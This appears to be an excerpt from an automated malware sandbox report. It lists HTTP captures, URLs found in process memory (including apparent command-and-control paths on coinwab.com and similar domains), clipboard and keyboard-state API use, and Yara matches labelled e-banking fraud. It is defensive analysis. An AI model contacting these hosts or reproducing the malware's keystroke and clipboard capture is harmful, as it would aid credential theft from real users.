c4 c6 c8 b3 23 c7 f7 2a d5 ab d7 57 8e 58 c7 2e 5f 6e 1e b3 ea 56 3a 48 3a 98 f0 3d 17 cd 1b a5 f9 c3 54 ca d6 40 7a ce 86 0a 23 f3 dd b0 5c 2d a1 bd 0a 02 3f 38 64 87 9a 58 46 9f 30 b0 1b a5 e2 40 b0 48 66 e1 51 b4 c1 16 7e 66 b9 08 2e 30 1a 69 24 3c b4 6c b3 9d 8a f2 cd d4 1d 24 a3 a5 b1 da f6 3b e3 0c d5 6d 63 08 5b 09 fd af 45 e6 6b a5 48 e5 32 c6 ec e4 53 ab dd 6d b9 4e b7 17 01 0f 34 96 0a 8a e3 70 e3 56 2b ad a0 21 a7 4a f4 e8 29 de 3b ce e6 c2 ae 86 e7 47 24 52 a4 ae 60 a2 f8 eb 78 2f 7e 14 ef c4 8f 45 fc 6d 7c 27 79 1f 1f ef c5 bb c9 07 c9 0d 7c de c5 ef 5e bc 1d df a1 ea ed 25 af 1d 0e 57 ea f0 44 ed b3 6d 83 50 9b 61 b5 17 45 c3 f0 ac 65 c1 f1 4c b8 ae 76 06 cf df f0 5d 
d7 df 12 9e ef 0f 15 50 82 0f f0 03 a0 45 05 c0 b3 0c ba e4 d0 ad 36 3c be 0f 61 fe 46 b3 9b c9 fb c9 cd ba 25 9b 75 0b eb 68 d6 67 16 d3 55 ad 56 ea e5 c6 56 20 87 43 0c 9a 2a 78 b6 bc c5 be d8 82 2f 80 12 16 36 62 b3 f4 fc 30 02 81 18 61 24 23 c7 86 01 66 66 9d d2 b5 91 ce 4f 76 5a 9e 68 63 c6 22 06 53 43 69 0e 67 f4 96 9b f5 e1 e2 7e 1d a5 11 0c 37 7d 76 3b d5 db 41 33 de d5 a6 8a 9f 90 0d e3 27 6c d7 07 fb 2c 39 a5 ee e1 a2 25 b7 47 51 e4 7b 61 a6 6b ac b9 00 00 5d 09 29 f5 07 18 c0 f5 83 16 5b 58 79 36 c1 2c ad 08 9d f7 54 0b b6 1f 48 97 0d 91 ea 33 ef 9f eb 2e 6d cf 46 01 17 17 86 18 ca 4e 07 26 6a b9 84 9a 59 d4 11 31 6b e4 59 5b 3d df 09 ad 55 bb a7 ec 7e 63 a9 c3 01 62 96 b7 97 e4 60 b8 82 f6 ad d0 1f 05 b6 6a 64 d3 13 23 97 9a bf a1 11 08 81 a2 b8 56 72 98 a2 ec 4c d9 05 3f 3c 78 2d 1d 7f 20 9d 9c d8 33 67 29 88 ad 1b 58 9e da b2 56 47 d1 20 93 6c 9f e4 54 47 71 65 34 c8 a4 5e a2 22 1b 2b 92 4e d7 6b 84 50 90 d7 69 61 9c 83 17 19 ff 03 80 f8 6f bc 23 92 8f e2 bd e4 93 e4 a6 88 ef 67 5c 70 b4 e0 7e e1 50 7a 73 b0 3a 0
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 02 Jul 2024 12:09:17 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 65 32 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cd 5a 6d 6f db d6 15 fe 9e 5f 71 a3 01 96 94 88 64 9c b4 43 12 4b 72 d3 a4 db 97 b4 1d e0 74 c3 e0 a6 c2 15 75 2d b1 a2 48 8d a4 ec a8 49 80 36 e9 2b 1a 34 68 57 60 43 b1 f7 61 d8 a7 01 89 13 af 6e 5e 9c bf 40 fe a3 3d e7 5c 92 a2 64 c9 71 d2 b4 ab 01 db d2 7d 3d f7 9c e7 3c e7 dc 97 fa d1 8e 6f 47 e3 a1 12 bd 68 e0 36 eb f4 57 d8 ae 0c c3 46 c9 09 5b b2 23 87 91 b3 a9 4a c2 95 5e b7 51 0a 46 25 b4 51 b2 d3 ac 0f 54 24 85 dd 93 41 a8 a2 46 e9 ad 4b bf 30 4e a3 8e 4b 3d 39 50 8d d2 50 06 7d c7 eb 96 84 ed 7b 91 f2 d0 28 50 dd 60 64 04 18 73 ba e5 a6 a3 b6 86 7e 10 15 9a 6e 39 9d a8 d7 e8 a8 4d c7 56 06 7f a9 39 9e 13 39 d2 35 42 5b ba aa b1 8c 21 22 27 72 55 73 6b 6b cb dc 92 61 cf f1 cd 2d 3f 70 3b 75 4b 97 d7 5d c7 eb 8b 40 b9 8d 52 18 8d 5d 15 f6 94 c2 14 03 d5 71 64 a3 24 5d b7 24 7a 81 da c8 05 65 c1 0c 39 8a 7c d3 0e 43 0c 3f e9 ef 60 09 59 eb 0d 09 99 7c cf c4 9f d5 e5 92 20 dd 41 55 03 d9 55 d6 15 83 1b 36 eb a1 1d 38 c3 a8 69 1d ab 1f 5d 3f 7f e1 dc a5 73 eb c7 ac 23 5b 8e d7 f1 b7 cc 28 90 76 7f 8d 1b 5c f4 65 47 34 c4 c6 c8 b3 23 c7 f7 2a d5 ab d7 57 8e 58 c7 2e 5f 6e 1e b3 ea 56 3a 48 3a 98 f0 3d 17 cd 1b a5 f9 c3 54 ca d6 40 7a ce 86 0a 23 f3 dd b0 5c 2d a1 bd 0a 02 3f 38 64 87 9a 58 46 9f 30 b0 1b a5 e2 40 b0 48 66 e1 51 b4 c1 16 7e 66 b9 08 2e 30 1a 69 24 3c b4 6c b3 9d 8a f2 cd d4 1d 24 a3 a5 b1 da f6 3b e3 0c d5 6d 63 08 5b 09 fd af 45 e6 6b a5 48 e5 32 c6 ec e4 53 ab dd 6d b9 4e b7 17 01 0f 34 96 0a 8a e3 70 e3 56 2b ad a0 21 a7 4a f4 e8 29 de 3b ce e6 c2 ae 86 e7 47 24 52 a4 ae 60 a2 f8 eb 78 2f 7e 14 ef c4 8f 45 fc 6d 7c 27 79 1f 1f ef c5 bb c9 07 c9 0d 7c de c5 ef 5e bc 1d df a1 ea ed 25 af 1d 0e 57 ea f0 44 ed b3 6d 83 50 9b 61 b5 17 45 c3 f0 ac 65 c1 f1 4c b8 ae 76 06 cf df f0 5d 
d7 df 12 9e ef 0f 15 50 82 0f f0 03 a0 45 05 c0 b3 0c ba e4 d0 ad 36 3c be 0f 61 fe 46 b3 9b c9 fb c9 cd ba 25 9b 75 0b eb 68 d6 67 16 d3 55 ad 56 ea e5 c6 56 20 87 43 0c 9a 2a 78 b6 bc c5 be d8 82 2f 80 12 16 36 62 b3 f4 fc 30 02 81 18 61 24 23 c7 86 01 66 66 9d d2 b5 91 ce 4f 76 5a 9e 68 63 c6 22 06 53 43 69 0e 67 f4 96 9b f5 e1 e2 7e 1d a5 11 0c 37 7d 76 3b d5 db 41 33 de d5 a6 8a 9f 90 0d e3 27 6c d7 07 fb 2c 39 a5 ee e1 a2 25 b7 47 51 e4 7b 61 a6 6b ac b9 00 00 5d 09 29 f5 07 18 c0 f5 83 16 5b 58 79 36 c1 2c ad 08 9d f7 54 0b b6 1f 48 97 0d 91 ea 33 ef 9f eb 2e 6d cf 46 01 17 17 86 18 ca 4e 07 26 6a b9 84 9a 59 d4 11 31 6b e4 59 5b 3d df 09 ad 55 bb a7 ec 7e 63 a9 c3 01 62 96 b7 97 e4 60 b8 82 f6 ad d0 1f 05 b6 6a 64 d3 13 23 97 9a bf a1 11 08 81 a2 b8 56 72 98 a2 ec 4c d9 05 3f 3c 78 2d 1d 7f 20 9d 9c d8 33 67 29 88 ad 1b 58 9e da b2 56 47 d1 20 93 6c 9f e4 54 47 71 65 34 c8 a4 5e a2 22 1b 2b 92 4e d7 6b 84 50 90 d7 69 61 9c 83 17 19 ff 03 80 f8 6f bc 23 92 8f e2 bd e4 93 e4 a6 88 ef 67 5c 70 b4 e0 7e e1 50 7a 73 b0 3a 0
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 02 Jul 2024 12:09:20 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeData Raw: 32 39 33 64 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 69 73 5f 61 64 61 70 74 69 76 65 22 20 6c 61 6e 67 3d 22 72 75 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 70 61 72 6b 69 6e 67 22 20 63 6f 6e 74 65 6e 74 3d 22 72 65 67 72 75 2d 72 64 61 70 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 74 69 74 6c 65 3e 77 77 77 2e 77 61 73 68 69 6f 2e 77 6f 72 6c 64 3c 2f 74 69 74 6c 65 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 68 72 65 66 3d 22 70 61 72 6b 69 6e 67 2d 72 64 61 70 2d 61 75 74 6f 2e 63 73 73 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 66 61 76 69 63 6f 6e 2e 69 63 6f 3f 31 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 3c 73 63 72 69 70 74 3e 2f 2a 3c 21 5b 43 44 41 54 41 5b 2a 2f 0a 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 3b 0a 2f 2a 5d 5d 3e 2a 2f 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 6f 6e 6c 6f 61 64 3d 22 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 28 27 2f 6d 61 6e 69 66 65 73 74 2e 6a 73 27 29 22 20 6f 6e 65 72 72 6f 72 3d 22 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 28 27 2f 6d 61 6e 69 66 65 73 74 2e 6a 73 27 2c 20 31 29 22 20 73 72 63 3d 22 2f 6d 61 6e 69 66 65 73 74 2e 6a 73 22 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 6f 6e 6c 6f 61 64 3d 22 77 69 6e 64 6f 77 2e 
74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 28 27 2f 68 65 61 64 2d 73 63 72 69 70 74 73 2e 6a 73 27 29 22 20 6f 6e 65 72 72 6f 72 3d 22 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 28 27 2f 68 65 61 64 2d 73 63 72 69 70 74 73 2e 6a 73 27 2c 20 31 29 22 20 73 72 63 3d 22 2f 68 65 61 64 2d 73 63 72 69 70 74 73 2e 6a 73 22 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 62 2d 70 61 67 65 20 62 2d 70 61 67 65 5f 74 79 70 65 5f 70 61 72 6b 69 6e 67 20 62 2d 70 61 72 6b 69 6e 67 20 62 2d 70 61 72 6b 69 6e 67 5f 62 67 5f 6c 69 67 68 74 22 3e 3c 68 65 61 64 65 72 20 63 6c 61 73 73 3d 22 62 2d 70 61 72 6b 69 6e 67 5f 5f 68 65 61 64 65 72 20 62 2d 70 61 72 6b 69 6e 67 5f 5f 68 65 61 64 65 72 5f 74 79 70 65 5f 72 64 61 70 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 2d 70 61 72 6b 69 6e 67 5f 5f 68 65 61 64 65 72 2d 6e 6f 74 65 20 62 2d 74 65 78 74 22 3e d0 94 d0 be d0 bc d0 b5 d0 bd 20 d0 b7 d0 b0 d1 80 d0 b5 d0 b3 d0 b8 d1 81 d
          Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx/1.18.0 (Ubuntu) Date: Tue, 02 Jul 2024 12:09:48 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 564 Connection: close Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
          Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx/1.18.0 (Ubuntu) Date: Tue, 02 Jul 2024 12:09:51 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 564 Connection: close Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
          Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx/1.18.0 (Ubuntu) Date: Tue, 02 Jul 2024 12:09:54 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 564 Connection: close Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
          Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx/1.18.0 (Ubuntu) Date: Tue, 02 Jul 2024 12:09:56 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 564 Connection: close Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
          Source: TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe, 00000003.00000002.4125575598.0000000008328000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.0araba.net
          Source: TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe, 00000003.00000002.4125575598.0000000008328000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.0araba.net/s5jh/
          Source: TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe, 00000003.00000002.4124406392.0000000007096000.00000004.80000000.00040000.00000000.sdmp, PresentationHost.exe, 00000006.00000002.4122364070.0000000006716000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/gsap/3.1.1/gsap.min.js
          Source: TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe, 00000003.00000002.4124406392.0000000007096000.00000004.80000000.00040000.00000000.sdmp, PresentationHost.exe, 00000006.00000002.4122364070.0000000006716000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css
          Source: TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe, 00000003.00000002.4124406392.0000000007096000.00000004.80000000.00040000.00000000.sdmp, PresentationHost.exe, 00000006.00000002.4122364070.0000000006716000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/4.1.3/css/bootstrap.min.css
          Source: PresentationHost.exe, 00000006.00000002.4122364070.00000000060CE000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: https://coinwab.com/index.php/efdt/?wd98XJp=MALnGsSsCxZXAJsklBHSyvV4Cwt
          Source: PresentationHost.exe, 00000006.00000002.4122364070.00000000063F2000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: https://dhosting.pl
          Source: TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe, 00000003.00000002.4124406392.0000000006D72000.00000004.80000000.00040000.00000000.sdmp, PresentationHost.exe, 00000006.00000002.4122364070.00000000063F2000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: https://dhosting.pl/bledyhttp/domeny.html
          Source: TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe, 00000003.00000002.4124406392.0000000006D72000.00000004.80000000.00040000.00000000.sdmp, PresentationHost.exe, 00000006.00000002.4122364070.00000000063F2000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: https://dhosting.pl/bledyhttp/hosting.html
          Source: TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe, 00000003.00000002.4124406392.0000000006D72000.00000004.80000000.00040000.00000000.sdmp, PresentationHost.exe, 00000006.00000002.4122364070.00000000063F2000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: https://dhosting.pl/img/logo.svg
          Source: PresentationHost.exe, 00000006.00000002.4122364070.00000000063F2000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: https://dhosting.pl/kontakt
          Source: TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe, 00000003.00000002.4124406392.000000000754C000.00000004.80000000.00040000.00000000.sdmp, PresentationHost.exe, 00000006.00000002.4122364070.0000000006BCC000.00000004.10000000.00040000.00000000.sdmp, PresentationHost.exe, 00000006.00000002.4123664562.0000000007AE0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://download.quark.cn/download/quarkpc?platform=android&ch=pcquark
          Source: TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe, 00000003.00000002.4124406392.000000000754C000.00000004.80000000.00040000.00000000.sdmp, PresentationHost.exe, 00000006.00000002.4122364070.0000000006BCC000.00000004.10000000.00040000.00000000.sdmp, PresentationHost.exe, 00000006.00000002.4123664562.0000000007AE0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://g.alicdn.com/woodpeckerx/jssdk/plugins/globalerror.js
          Source: TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe, 00000003.00000002.4124406392.000000000754C000.00000004.80000000.00040000.00000000.sdmp, PresentationHost.exe, 00000006.00000002.4122364070.0000000006BCC000.00000004.10000000.00040000.00000000.sdmp, PresentationHost.exe, 00000006.00000002.4123664562.0000000007AE0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://g.alicdn.com/woodpeckerx/jssdk/plugins/performance.js
          Source: TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe, 00000003.00000002.4124406392.000000000754C000.00000004.80000000.00040000.00000000.sdmp, PresentationHost.exe, 00000006.00000002.4122364070.0000000006BCC000.00000004.10000000.00040000.00000000.sdmp, PresentationHost.exe, 00000006.00000002.4123664562.0000000007AE0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://g.alicdn.com/woodpeckerx/jssdk/wpkReporter.js
          Source: TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe, 00000003.00000002.4124406392.0000000007228000.00000004.80000000.00040000.00000000.sdmp, PresentationHost.exe, 00000006.00000002.4122364070.00000000068A8000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: https://help.reg.ru/support/ssl-sertifikaty/1-etap-zakaz-ssl-sertifikata/kak-zakazat-besplatnyy-ssl-
          Source: TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe, 00000003.00000002.4124406392.000000000754C000.00000004.80000000.00040000.00000000.sdmp, PresentationHost.exe, 00000006.00000002.4122364070.0000000006BCC000.00000004.10000000.00040000.00000000.sdmp, PresentationHost.exe, 00000006.00000002.4123664562.0000000007AE0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://hm.baidu.com/hm.js?
          Source: TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe, 00000003.00000002.4124406392.000000000754C000.00000004.80000000.00040000.00000000.sdmp, PresentationHost.exe, 00000006.00000002.4122364070.0000000006BCC000.00000004.10000000.00040000.00000000.sdmp, PresentationHost.exe, 00000006.00000002.4123664562.0000000007AE0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://image.uc.cn/s/uae/g/3o/berg/static/archer_index.e96dc6dc6863835f4ad0.js
          Source: TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe, 00000003.00000002.4124406392.000000000754C000.00000004.80000000.00040000.00000000.sdmp, PresentationHost.exe, 00000006.00000002.4122364070.0000000006BCC000.00000004.10000000.00040000.00000000.sdmp, PresentationHost.exe, 00000006.00000002.4123664562.0000000007AE0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://image.uc.cn/s/uae/g/3o/berg/static/index.c4bc5b38d870fecd8a1f.css
          Source: PresentationHost.exe, 00000006.00000002.4121169221.0000000002E58000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
          Source: PresentationHost.exe, 00000006.00000002.4121169221.0000000002E58000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
          Source: PresentationHost.exe, 00000006.00000002.4121169221.0000000002E58000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
          Source: PresentationHost.exe, 00000006.00000002.4121169221.0000000002E58000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033m
          Source: PresentationHost.exe, 00000006.00000002.4121169221.0000000002E58000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
          Source: PresentationHost.exe, 00000006.00000002.4121169221.0000000002E58000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
          Source: TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe, 00000003.00000002.4124406392.0000000007228000.00000004.80000000.00040000.00000000.sdmp, PresentationHost.exe, 00000006.00000002.4122364070.00000000068A8000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: https://parking.reg.ru/script/get_domain_data?domain_name=www.washio.world&rand=
          Source: TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe, 00000003.00000002.4124406392.0000000007228000.00000004.80000000.00040000.00000000.sdmp, PresentationHost.exe, 00000006.00000002.4122364070.00000000068A8000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: https://reg.ru
          Source: TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe, 00000003.00000002.4124406392.000000000754C000.00000004.80000000.00040000.00000000.sdmp, PresentationHost.exe, 00000006.00000002.4122364070.0000000006BCC000.00000004.10000000.00040000.00000000.sdmp, PresentationHost.exe, 00000006.00000002.4123664562.0000000007AE0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://track.uc.cn/collect
          Source: TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe, 00000003.00000002.4124406392.0000000007228000.00000004.80000000.00040000.00000000.sdmp, PresentationHost.exe, 00000006.00000002.4122364070.00000000068A8000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: https://www.googletagmanager.com/gtag/js?id=UA-3380909-25
          Source: TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe, 00000003.00000002.4124406392.0000000006406000.00000004.80000000.00040000.00000000.sdmp, PresentationHost.exe, 00000006.00000002.4122364070.0000000005A86000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000007.00000002.2315187674.0000000016EA6000.00000004.80000000.00040000.00000000.sdmp String found in binary or memory: https://www.kosherphonestore.com/y0az/?wd98XJp=1StTTN5BD
          Source: TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe, 00000003.00000002.4124406392.0000000007228000.00000004.80000000.00040000.00000000.sdmp, PresentationHost.exe, 00000006.00000002.4122364070.00000000068A8000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: https://www.reg.ru/dedicated/?utm_source=www.washio.world&utm_medium=parking&utm_campaign=s_land_ser
          Source: TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe, 00000003.00000002.4124406392.0000000007228000.00000004.80000000.00040000.00000000.sdmp, PresentationHost.exe, 00000006.00000002.4122364070.00000000068A8000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: https://www.reg.ru/domain/new/?utm_source=www.washio.world&utm_medium=parking&utm_campaign=s_land_ne
          Source: TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe, 00000003.00000002.4124406392.0000000007228000.00000004.80000000.00040000.00000000.sdmp, PresentationHost.exe, 00000006.00000002.4122364070.00000000068A8000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: https://www.reg.ru/hosting/?utm_source=www.washio.world&utm_medium=parking&utm_campaign=s_land_host&
          Source: TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe, 00000003.00000002.4124406392.0000000007228000.00000004.80000000.00040000.00000000.sdmp, PresentationHost.exe, 00000006.00000002.4122364070.00000000068A8000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: https://www.reg.ru/web-sites/?utm_source=www.washio.world&utm_medium=parking&utm_campaign=s_land_cms
          Source: TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe, 00000003.00000002.4124406392.0000000007228000.00000004.80000000.00040000.00000000.sdmp, PresentationHost.exe, 00000006.00000002.4122364070.00000000068A8000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: https://www.reg.ru/web-sites/website-builder/?utm_source=www.washio.world&utm_medium=parking&utm_cam
          Source: TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe, 00000003.00000002.4124406392.0000000007228000.00000004.80000000.00040000.00000000.sdmp, PresentationHost.exe, 00000006.00000002.4122364070.00000000068A8000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: https://www.reg.ru/whois/?check=&dname=www.washio.world&amp;reg_source=parking_auto
          Source: TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe, 00000003.00000002.4124406392.000000000672A000.00000004.80000000.00040000.00000000.sdmp, PresentationHost.exe, 00000006.00000002.4122364070.0000000005DAA000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: https://www.threendresses.com/ecb1/?wd98XJp=i1LTV2o1IZtmrbvE4asAhp8fTTMl8iuKZlDswLcPFQRrGDQpSYT4T6Qz
          Source: C:\Users\user\Desktop\nJ8mJTmMf0.exe Code function: 0_2_0067425A OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard, 0_2_0067425A
          Source: C:\Users\user\Desktop\nJ8mJTmMf0.exe Code function: 0_2_00674458 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard, 0_2_00674458
          Source: C:\Users\user\Desktop\nJ8mJTmMf0.exe | Code function: 0_2_00660219 GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,0_2_00660219
          Source: C:\Users\user\Desktop\nJ8mJTmMf0.exe | Code function: 0_2_0068CDAC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_0068CDAC

          E-Banking Fraud

          Source: Yara match | File source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 00000003.00000002.4125575598.00000000082C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000001.00000002.1978005632.0000000003080000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000001.00000002.1977710626.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000006.00000002.4121057875.0000000000B00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
